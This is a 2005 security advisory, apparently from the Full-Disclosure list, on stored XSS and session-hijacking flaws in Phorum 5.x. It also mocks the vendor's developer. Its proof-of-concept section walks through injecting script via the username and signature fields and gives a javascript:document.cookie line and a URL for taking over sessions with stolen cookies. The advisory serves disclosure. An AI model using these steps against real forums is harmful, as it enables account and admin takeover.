=======================================================================================
XOR Crew :: Security Advisory
9/1/2005
=======================================================================================
Phorum 5.x Multiple XSS and Session Hijacking Vulnerabilities
=======================================================================================
http://www.xorcrew.net/
=======================================================================================
:: Summary
Vendor : Phorum.org
Vendor Site : http://www.phorum.org
Product(s) : Phorum
Version(s) : 5.x
Severity : Low/Medium
Impact : Exposure of user credentials, session/account
hijacking.
Release Date : 8/27/2005
Credits : wr0ck (wr0ck (a) xorcrew (.) net),
: 0xception (oxception (a) xorcrew (.) net).
=======================================================================================
I. Description
Phorum is a web based message board written in PHP. Phorum is designed with
high-availability and visitor ease of use in mind. Features such as
mailing list
integration, easy customization and simple installation make Phorum a
powerful
add-in to any website.
=======================================================================================
II. Synopsis
Phorum <= 5.0.17a has multiple vulnerabilities ranging from XSS to
Session Hijacking
and (subjectively) insecure creation of client cookies.
The first of two XSS conditions lies within the User Registration form
in register.php.
Input to the 'Username:' field is not properly sanitized before the user
is added to the
database. See III. for details.
A less critical cross-site scripting issue is due to control.php not
securely parsing a
logged in user's signature when said user is in 'My Control Center',
viewing his own
profile. This allows HTML/<script> code to be injected into the profile
page. Example
provided in section III.
There were also 3 vulnerabilities discovered in the way that Phorum
deals with client
cookies, and session management. One of these is simply how Phorum
assigns users cookies --
instead of using a random session ID, it creates a cookie with contents
that might look
similar to the following:
testuser%3A59de1412ec33fd96ac4a4bfc793f1133
This string can be broken up into 3 parts:
Username ":" MD5 Encrypted Password ("testpasswd")
testuser | %3A | 59de1412ec33fd96ac4a4bfc793f1133
This means that all an attacker needs to break into a person's Phorum
account is the
contents of their session cookie and a method of cracking the obtained hash.
Because a user is authenticated to the application by means of a static
cookie instead of
a random session identifier, it is possible to hijack a user's session
by editing your
own cookie to match or adequately resemble that of another user's,
provided that you have
the contents of that user's cookie (cookie poisoning). See below for
examples.
=======================================================================================
III. Code/PoC
XSS(1): Navigate to register.php in the phorum installation directory on
'your' server.
Enter HTML/<script> code in the 'Username' field of the
registration form --
the email and password you enter don't matter. Then, if you
already haven't,
register/login as a second user and browse to 'My Control
Center', then 'Send
A Private Message'. This will take you to a page that contains
a drop-down box
with the usernames of all registered users, including the
malicious username you
created earlier. When the list of processed, the username's are
not checked for
bad characters, and the "username" you submitted for
registration is executed.
XSS(2): Login as any user, navigate to 'My Control Center', then 'Edit
Signature'. Insert
HTML/<script> code in the provided input box and 'Submit' it to
save. Then browse
to 'View Profile'. The code entered as your signature is executed.
Hijacking(1): Login as any user to create your own session cookie.
Obtain/steal the
'phorum_admin_session' cookie contents from a user with
administrative
privileges. Go to the admin.php page in the main
directory of your Phorum
installation. Modify your own cookie by executing
something similar to the
following within your browser:
javascript:document.cookie="phorum_admin_session=<admin
cookie>";
Refresh. :>
Hijacking(2): Login as any user and navigate to 'My Control Center'
(will bring you
to control.php). Clear the cookie that was created upon
your login and enter
a URL similar to (re-crafted with your own relevant
information):
http://<url>/phorum5/control.php?phorum_session_v5=<cookieInfr0z>
If done correctly, you'll then be logged in as the user
who's cookie information
was supplied.
NOTE: We realize that session hijacking issues are not Phorum-specific,
and generally
apply to all web applications that handle user sessions in a way
such as this. However,
for the sake of completeness, this information has been included
in the advisory more
for educational purposes and as an example of the potential
impact of the outlined XSS
problem(s).
Mr. Moon (the Phorum developer contacted) was kind enough to say:
"I will be sending you another email when we have these problems
fixed."
...no email was recieved. Additionally, he down-played the
session hijacking entirely,
stating:
"We have researched and investigated ways to remember users
across sessions that does
not require them to login in again each time they come to the
site. We have found no
way to do that without some cookie (whether it is the current
one or not does not matter)
that if known by another user would allow that other user to
hijack the account."
While this is partially true, methinks your dev team needs to put
a little more effort
into their "research". Surely using the user's hashed PASSWORD as
a form of unexpirable
session ID couldn't have been too smart. Also, before I had the
chance to reply to his
ignorant email and offer polite suggestions as to how he could
more securely manage his
user's sessions, he updates Phorum.org to read:
"...We have talked at length about how we create our session
cookies. Its true that
if someone can get your cookie, they can log in as you. But, that
is gonna be true for
any application/web site on the internet."
Brian, buddy, first of all that's not true.. at all. Secondly, I
hardly consider my
initial notice followed by your response an in-depth conversation.
Either way, w3 l0v3 y0u 4nd y0ur BIG m0u7h :)
=======================================================================================
IV. Fix
Upgrade to Phorum v5.0.18... or Invision Power Board.
=======================================================================================
V. Greets :>
All of xor, Infinity, stokhli, ajax, gml, k&k, seeprompt, the rest.
=======================================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/